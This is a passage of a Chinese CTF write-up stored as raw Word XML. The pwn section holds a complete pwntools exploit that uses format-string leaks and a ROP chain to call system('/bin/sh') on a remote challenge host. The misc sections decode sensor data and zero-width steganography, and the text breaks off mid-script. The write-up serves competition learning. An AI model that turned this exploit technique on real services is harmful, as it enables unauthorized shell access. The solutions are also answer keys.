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misc"/>
      <w:r>
        <w:t>PWN</w:t>
      </w:r>
    </w:p>
    <w:p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4"/>
      </w:pPr>
      <w:r>
        <w:t>Note</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:r>
        <w:t>from pwn import *</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:r>
        <w:t>def main(index):</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:t>p.sendlineafter(b'choice: ', str(index))</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:r>
        <w:t>def add(size, content):</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:t>main(1)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:t>p.sendlineafter(b'size: ', str(size))</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:t>p.sendlineafter(b'content: ', content)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:r>
        <w:t>def say(say1, say2):</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:t>main(2)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:t>p.sendlineafter(b'say ? ', say1)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:t>p.sendlineafter(b'? ', say2)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:r>
        <w:t>#p = process(b'./note')</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:r>
        <w:t>p = remote('47.104.70.90','25315')</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:r>
        <w:t>libc = ELF(b'libc-2.23.so')</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:r>
        <w:t>add(0x10,b'crl123')</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:r>
        <w:t>p.recvuntil(b'addr: ')</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:r>
        <w:t>heap_addr = p.recvline().replace(b'\n',b'')</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:r>
        <w:t>say11 = b'%7$s'+b'aaaa'+p64(int(heap_addr.decode()[2:],16))</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:r>
        <w:t>say12 = b'a'*0x18+p64(0xfe1)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:r>
        <w:t>say(say11, say12)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:r>
        <w:t>for i in range(24):</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:t>add(0x90,b'a'*0x90)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:r>
        <w:t>add(0xd0,b'a'*0xd0)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:r>
        <w:t>add(0x10,b'a'*8)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:r>
        <w:t>main(3)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:r>
        <w:t>p.recvuntil(b'content:aaaaaaaa\n')</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:r>
        <w:t>malloc_hook = u64((b'\x00'+p.recv(5)).ljust(8,b'\x00'))-224-0x10</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:r>
        <w:t>base = malloc_hook-libc.sym['__malloc_hook']</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:r>
        <w:t>system = base+libc.sym['system']</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:r>
        <w:t>#ROPgadget --binary libc-2.23.so --string '/bin/sh'</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:r>
        <w:t>binsh = base + 0x000000000018ce57</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:r>
        <w:t>#ROPgadget --binary libc-2.23.so --only "pop|ret" | grep "rdi"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:r>
        <w:t>poprdi_ret = base+0x0000000000021112</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:r>
        <w:t>say21 = b'%17$s'</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:r>
        <w:t>say22 = b'a'*8+p64(poprdi_ret)+p64(binsh)+p64(system)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:r>
        <w:t>say(say21,say22)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:r>
        <w:t>p.sendline(b"done")</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:r>
        <w:t>p.interactive()</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w: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2"/>
      </w:pPr>
      <w:r>
        <w:t>MISC</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w: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4"/>
      </w:pPr>
      <w:bookmarkStart w:id="1" w:name="chieftainssecret"/>
      <w:r>
        <w:t>ChieftainsSecret</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>题目到手之后用fore</w:t>
      </w:r>
      <w:r>
        <w:t>most</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>分离出照片：</w:t>
      </w:r>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5273040" cy="2606040"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="15" name="图片 8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diagr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31545"/>
            <wp:effectExtent l="0" t="0" r="1397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根据提示可以猜测是在老式电话中安装了这样一个装置。通过搜素发现T</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>LE5501</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>是英飞凌公司生产的角度传感器，并采用差分输出。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5274310" cy="4050030"/>
            <wp:effectExtent l="0" t="0" r="1397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通过查阅芯片手册可以知道csv文件是单片机的A</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>D</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>采样值。在该芯片的官网搜索到了例程，于是在例程中查找公式。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5274310" cy="2966720"/>
            <wp:effectExtent l="0" t="0" r="1397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猜测是通过这个函数来获取角度值，继续看代码</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5274310" cy="2487295"/>
            <wp:effectExtent l="0" t="0" r="1397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13155"/>
            <wp:effectExtent l="0" t="0" r="1397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1722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89940"/>
            <wp:effectExtent l="0" t="0" r="139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于是可以得到计算公式。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在excel中计算得到角度值如下</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5274310" cy="2829560"/>
            <wp:effectExtent l="0" t="0" r="139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根据换算后的角度值画波形图如下</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5274310" cy="3223260"/>
            <wp:effectExtent l="0" t="0" r="1397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  <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:eastAsiaTheme="minorEastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>分析图片发现有1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:eastAsiaTheme="minorEastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>个最低点，符合题目描述的1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:eastAsiaTheme="minorEastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>位数字</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:eastAsiaTheme="minorEastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>设9</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>0</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:eastAsiaTheme="minorEastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>度时候为复位，最低点1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>76</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:eastAsiaTheme="minorEastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>约等于1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>80</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:eastAsiaTheme="minorEastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>为数字0位置，按照角度估算</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:eastAsiaTheme="minorEastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>依次可得号码</w:t>
      </w:r>
      <w:r>
        <w:t>77085962457</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w: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"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:bookmarkStart w:id="2" w:name="鸣雏恋"/>
      <w:r>
        <w:t>鸣雏恋</w:t>
      </w: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压缩包形式打开拿到</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5481955" cy="3636010"/>
            <wp:effectExtent l="0" t="0" r="4445" b="635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010打开发现有零宽字节</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5425440" cy="807720"/>
            <wp:effectExtent l="0" t="0" r="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尝试解零宽加密</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5480685" cy="1331595"/>
            <wp:effectExtent l="0" t="0" r="5715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得到密码解压压缩包</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5485130" cy="3554095"/>
            <wp:effectExtent l="0" t="0" r="1270" b="1206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写脚本转二进制再转字符串</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="39"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="72"/>
        </w:rPr>
        <w:t xml:space="preserve">white </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="62"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="72"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="63"/>
        </w:rPr>
        <w:t>open</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="72"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="51"/>
        </w:rPr>
        <w:t>r'D:\aaaaaaaa\b\out\0.png'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="72"/>
        </w:rPr>
        <w:t>,
</w:t>
      </w:r>
      <w:r>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="72"/>
        </w:rPr>
        <w:t xml:space="preserve">             </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="50"/>
        </w:rPr>
        <w:t>'rb'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="72"/>
        </w:rPr>
        <w:t>).read()
</w:t>
      </w:r>
      <w:r>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="72"/>
        </w:rPr>
        <w:t xml:space="preserve">black </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="62"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="72"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="63"/>
        </w:rPr>
        <w:t>open</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="72"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="51"/>
        </w:rPr>
        <w:t>r'D:\aaaaaaaa\b\out\1.png'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="72"/>
        </w:rPr>
        <w:t>,
</w:t>
      </w:r>
      <w:r>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="72"/>
        </w:rPr>
        <w:t xml:space="preserve">             </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="50"/>
        </w:rPr>
        <w:t>'rb'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="72"/>
        </w:rPr>
        <w:t>).read()
</w:t>
      </w:r>
      <w:r>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="72"/>
        </w:rPr>
        <w:t xml:space="preserve">flag </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="62"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="72"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="50"/>
        </w:rPr>
        <w:t>''</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="72"/>
        </w:rPr>
        <w:t>
</w:t>
      </w:r>
      <w:r>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="72"/>
        </w:rPr>
        <w:t>
</w:t>
      </w:r>
      <w:r>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="61"/>
        </w:rPr>
        <w:t>for</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="72"/>
        </w:rPr>
        <w:t xml:space="preserve"> i </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="42"/>
        </w:rPr>
        <w:t>in</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="72"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="63"/>
        </w:rPr>
        <w:t>range</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="72"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="44"/>
        </w:rPr>
        <w:t>129488</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="72"/>
        </w:rPr>
        <w:t>):
</w:t>
      </w:r>
      <w:r>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="72"/>
        </w:rPr>
        <w:t xml:space="preserve">    color </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="62"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="72"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="63"/>
        </w:rPr>
        <w:t>open</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="72"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="51"/>
        </w:rPr>
        <w:t>r'D:\aaaaaaaa\b\out\</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="49"/>
        </w:rPr>
        <w:t>%d</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="51"/>
        </w:rPr>
        <w:t>.png'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="72"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="62"/>
        </w:rPr>
        <w:t>%</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="72"/>
        </w:rPr>
        <w:t xml:space="preserve"> i,
</w:t>
      </w:r>
      <w:r>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="72"/>
        </w:rPr>
        <w:t xml:space="preserve">                 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="50"/>
        </w:rPr>
        <w:t>'rb'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="72"/>
        </w:rPr>
        <w:t>).read()
</w:t>
      </w:r>
      <w:r>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="72"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="61"/>
        </w:rPr>
        <w:t>if</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="72"/>
        </w:rPr>
        <w:t xml:space="preserve"> (color </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="62"/>
        </w:rPr>
        <w:t>==</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="72"/>
        </w:rPr>
        <w:t xml:space="preserve"> white):
</w:t>
      </w:r>
      <w:r>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="72"/>
        </w:rPr>
        <w:t xml:space="preserve">        flag </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="62"/>
        </w:rPr>
        <w:t>+=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="72"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="50"/>
        </w:rPr>
        <w:t>'0'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="72"/>
        </w:rPr>
        <w:t>
</w:t>
      </w:r>
      <w:r>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="72"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="61"/>
        </w:rPr>
        <w:t>else</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="72"/>
        </w:rPr>
        <w:t>:
</w:t>
      </w:r>
      <w:r>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="72"/>
        </w:rPr>
        <w:t xml:space="preserve">        flag </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="62"/>
        </w:rPr>
        <w:t>+=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="72"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="50"/>
        </w:rPr>
        <w:t>'1'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="72"/>
        </w:rPr>
        <w:t>
</w:t>
      </w:r>
      <w:r>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="72"/>
        </w:rPr>
        <w:t xml:space="preserve">ans </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="62"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="72"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="50"/>
        </w:rPr>
        <w:t>''</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="72"/>
        </w:rPr>
        <w:t>
</w:t>
      </w:r>
      <w:r>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="72"/>
        </w:rPr>
        <w:t xml:space="preserve">length </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="62"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="72"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="63"/>
        </w:rPr>
        <w:t>len</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="72"/>
        </w:rPr>
        <w:t xml:space="preserve">(flag) </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="62"/>
        </w:rPr>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="72"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="44"/>
        </w:rPr>
        <w:t>8</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="72"/>
        </w:rPr>
        <w:t>
</w:t>
      </w:r>
      <w:r>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="61"/>
        </w:rPr>
        <w:t>for</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="72"/>
        </w:rPr>
        <w:t xml:space="preserve"> i </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="42"/>
        </w:rPr>
        <w:t>in</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="72"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="63"/>
        </w:rPr>
        <w:t>range</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="72"/>
        </w:rPr>
        <w:t>(length):
</w:t>
      </w:r>
      <w:r>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="72"/>
        </w:rPr>
        <w:t xml:space="preserve">    ans </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="62"/>
        </w:rPr>
        <w:t>+=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="72"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="63"/>
        </w:rPr>
        <w:t>chr</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="72"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="63"/>
        </w:rPr>
        <w:t>int</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="72"/>
        </w:rPr>
        <w:t xml:space="preserve">(flag[i </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="62"/>
        </w:rPr>
        <w:t>*</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="72"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="44"/>
        </w:rPr>
        <w:t>8</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="72"/>
        </w:rPr>
